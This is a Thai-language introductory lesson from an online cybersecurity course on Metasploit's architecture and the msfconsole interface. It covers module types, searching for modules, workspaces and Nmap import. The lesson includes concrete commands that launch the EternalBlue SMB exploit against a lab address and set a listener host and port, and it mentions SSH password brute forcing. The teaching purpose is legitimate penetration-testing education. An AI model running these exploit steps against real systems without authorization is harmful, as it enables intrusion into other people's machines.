สถาปัตยกรรม Metasploit และ msfconsole
เรียนรู้การใช้งาน msfconsole ทำความเข้าใจโครงสร้างของช่องโหว่ เพย์โหลด และโมดูล พร้อมกำหนดค่าตัวเลือก
สถาปัตยกรรม Metasploit และ msfconsole เป็นบทเรียน Cyber Security Academy ฟรีบน CoddyKit นี่คือบทเรียนที่ 1 จากทั้งหมด 4 บทเรียน คุณสามารถอ่านบทเรียนทั้งหมดด้านล่างฟรี — จากนั้นลองปฏิบัติด้วยตัวคุณเองในเบราว์เซอร์พร้อมตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7 บทเรียนนี้เป็นส่วนหนึ่งของเส้นทางการเรียน Cyber Security Academy และความก้าวหน้าของคุณจะซิงค์ข้ามเว็บและแอป CoddyKit คอร์ส Cyber Security Academy มีบทเรียนทั้งหมด 4 บทเรียน
Metasploit คืออะไร
Metasploit Framework เป็นแพลตฟอร์มทดสอบการเจาะระบบแบบโอเพนซอร์ส ซึ่งมีอินเทอร์เฟซแบบรวมสำหรับการพัฒนา การทดสอบ และการเรียกใช้โค้ดโจมตีช่องโหว่ แพลตฟอร์มนี้เป็นเครื่องมือมาตรฐานของอุตสาหกรรมสำหรับการใช้ประโยชน์จากช่องโหว่ที่ได้รับอนุญาตในสภาพแวดล้อมห้องปฏิบัติการ
คอมโพเนนต์ของ Metasploit
คอมโพเนนต์สำคัญ ได้แก่ msfconsole (CLI แบบโต้ตอบ), msfvenom (เครื่องมือสร้างเพย์โหลด), Metasploit DB (PostgreSQL สำหรับจัดเก็บโฮสต์/เซสชัน) และ Armitage (ส่วนหน้า GUI)
การเริ่มต้น msfconsole
เปิดใช้ msfconsole และเริ่มต้นฐานข้อมูล พรอมต์จะเปลี่ยนเป็น msf6 > การเติมคำอัตโนมัติด้วยแป้นแท็บใช้ได้กับคำสั่งทั้งหมด ชื่อโมดูล และตัวเลือก
# Start msfconsole
msfconsole
# Initialize database (if needed)
msfdb init
msfdb start
# Check DB connection
msf6 > db_status
# [*] Connected to msf. Connection type: postgresql.ประเภทของโมดูล
Metasploit จัดความสามารถต่าง ๆ เป็นประเภทโมดูล ได้แก่ exploit (โค้ดโจมตีเฉพาะช่องโหว่), payload (โค้ดที่ทำงานหลังใช้ประโยชน์จากช่องโหว่), auxiliary (เครื่องมือสแกน/ฟัซเซอร์), post (การทำงานหลังการใช้ประโยชน์จากช่องโหว่), encoder และ nop
msf6 > show exploits # list exploit modules
msf6 > show auxiliary # list auxiliary modules
msf6 > show payloads # list payloads
msf6 > show post # post-exploitation modulesการค้นหาโมดูล
คำสั่ง search จะกรองโมดูลตามชื่อ CVE แพลตฟอร์ม หรือระดับความน่าเชื่อถือ ระดับของโมดูลบ่งบอกความน่าเชื่อถือ: Excellent > Great > Good > Normal > Average > Low
msf6 > search type:exploit name:eternalblue
msf6 > search cve:2021-44228
msf6 > search platform:windows smb
msf6 > search rank:excellent ms17การใช้โมดูลโจมตีช่องโหว่
เลือกโมดูลด้วย use ดูตัวเลือกที่จำเป็นด้วย show options กำหนดค่าด้วย set และเรียกใช้ด้วย run หรือ exploit
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(ms17_010_eternalblue) > show options
msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.100
msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.1.10
msf6 exploit(ms17_010_eternalblue) > runการกำหนดตัวเลือกส่วนกลาง
setg จะกำหนดตัวเลือกให้ใช้ทั่วโลกกับโมดูลถัดไปทั้งหมด ซึ่งมีประโยชน์สำหรับ LHOST, LPORT และ RHOSTS ที่ยังคงเดิมตลอดการประเมิน
msf6 > setg LHOST 192.168.1.10
msf6 > setg LPORT 4444
# Unset global
msf6 > unsetg LHOSTโมดูลเสริม
โมดูลเสริมใช้สำหรับการสแกน การแจกแจงข้อมูล และการฟัซซิง โดยไม่ส่งเพย์โหลด ตัวอย่างเช่น เครื่องมือสแกนรุ่นของ SMB การเดารหัสผ่านเพื่อเข้าสู่ระบบ SSH แบบลองทุกความเป็นไปได้ และเครื่องมือสแกนไดเรกทอรี HTTP
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(smb_version) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(smb_version) > set THREADS 10
msf6 auxiliary(smb_version) > runการจัดการพื้นที่ทำงาน
พื้นที่ทำงานใช้จัดระเบียบข้อมูลการสแกนและเซสชันแยกตามการประเมินแต่ละครั้ง สร้างพื้นที่ทำงานใหม่เมื่อเริ่มการประเมินแต่ละครั้งเพื่อแยกข้อมูลออกจากกัน
msf6 > workspace # list workspaces
msf6 > workspace -a lab_test # create
msf6 > workspace lab_test # switch
msf6 > hosts # show discovered hosts
msf6 > services # show discovered servicesการผสานรวม Nmap
นำเข้าผลการสแกน XML ของ Nmap ไปยังฐานข้อมูลของ Metasploit ได้โดยตรง เพื่อเติมข้อมูลลงในตารางโฮสต์และบริการ ทำให้เลือกโมดูลได้อย่างตรงเป้าหมาย
msf6 > db_nmap -sV 192.168.1.0/24
# Or import existing XML:
msf6 > db_import /path/to/scan.xml
msf6 > hosts
msf6 > services -p 445ความช่วยเหลือและเอกสารประกอบ
ทุกโมดูลมีเอกสารประกอบในตัว ใช้ info เพื่ออ่านคำอธิบายโมดูล ระดับความน่าเชื่อถือ แหล่งอ้างอิง (CVE, คำแนะนำด้านความปลอดภัย) และตัวเลือกที่จำเป็น
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > info
# Shows: description, CVE references,
# platform, architecture, reliability rankตรวจสอบอย่างรวดเร็ว
คำสั่งใดใช้เลือกโมดูลใน msfconsole
สรุป: สถาปัตยกรรมของ Metasploit
msfconsole เป็นศูนย์กลางสำหรับค้นหาโมดูล กำหนดตัวเลือก เรียกใช้โค้ดโจมตีช่องโหว่ และจัดการเซสชัน ทำงานภายในพื้นที่ทำงานที่ตั้งชื่อไว้เสมอ นำเข้าผลลัพธ์จาก Nmap เพื่อเติมข้อมูลในฐานข้อมูล และอ่านข้อมูลโมดูลก่อนเรียกใช้สิ่งใด ๆ — ทำความเข้าใจว่าคุณกำลังเรียกใช้อะไรและเพราะเหตุใด
คำถามที่พบบ่อย
บทเรียน “สถาปัตยกรรม Metasploit และ msfconsole” ฟรีหรือไม่
ใช่ — ข้อความเต็มของ “สถาปัตยกรรม Metasploit และ msfconsole” ฟรีให้อ่านที่นี่บนเว็บ เพื่อปฏิบัติแบบโต้ตอบ (ตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7) และปลดล็อคส่วนที่เหลือของคอร์ส Cyber Security Academy ให้อัปเกรดเป็น CoddyKit PRO คอร์ส Cyber Security Academy มีบทเรียนทั้งหมด 4 บทเรียน
คุณจะเรียนรู้อะไรในบทเรียน “สถาปัตยกรรม Metasploit และ msfconsole”
เรียนรู้การใช้งาน msfconsole ทำความเข้าใจโครงสร้างของช่องโหว่ เพย์โหลด และโมดูล พร้อมกำหนดค่าตัวเลือก คุณปฏิบัติ Cyber Security Academy ด้วยโค้ดที่ใช้งานได้จริงที่คุณเรียกใช้โดยตรงในเบราว์เซอร์ และติวเตอร์ AI ตลอด 24/7 ตอบคำถามของคุณขณะที่คุณไปผ่านบทเรียน
คุณต้องมีประสบการณ์ก่อนที่จะเริ่มเรียน Cyber Security Academy หรือไม่
ไม่จำเป็นต้องมีประสบการณ์มาก่อน Cyber Security Academy บน CoddyKit ออกแบบมาสำหรับผู้เริ่มต้นไปจนถึงผู้เรียนขั้นสูง คุณสามารถเริ่มต้นที่นี่หรือเริ่มจากตัวแรกและเรียนด้วยความเร็วของคุณเอง นี่คือบทเรียนที่ 1 จากทั้งหมด 4 บทเรียน
บทเรียน “สถาปัตยกรรม Metasploit และ msfconsole” ใช้เวลานานแค่ไหน
บทเรียน CoddyKit ส่วนใหญ่ใช้เวลาประมาณ 5–10 นาที แต่ละบทเรียนจึงสั้นและเป็นแบบโต้ตอบ คุณสามารถก้าวหน้าอย่างต่อเนื่องและกลับมาเรียนต่อจากตรงที่เพิ่งหยุดบนเว็บและแอปได้เลย
ฉันเขียนและรันโค้ดในบทเรียน Cyber Security Academy นี้ได้ไหม
ได้ บทเรียน Cyber Security Academy ทุกบทมีตัวแก้ไขโค้ดในตัว คุณจึงเขียนและรันโค้ดจริงได้เลยในเบราว์เซอร์ และได้รับข้อเสนอแนะจาก AI ในทันที — ไม่ต้องติดตั้งในเครื่องของคุณ
บทเรียนทั้งหมดในหลักสูตรนี้
- สถาปัตยกรรม Metasploit และ msfconsole
- การใช้ประโยชน์จากช่องโหว่ที่ทราบแล้ว
- เพย์โหลด: แบบแบ่งขั้นกับแบบไม่แบ่งขั้น และ Meterpreter
- หลังการเจาะระบบ: เปลี่ยนเส้นทางและคงอยู่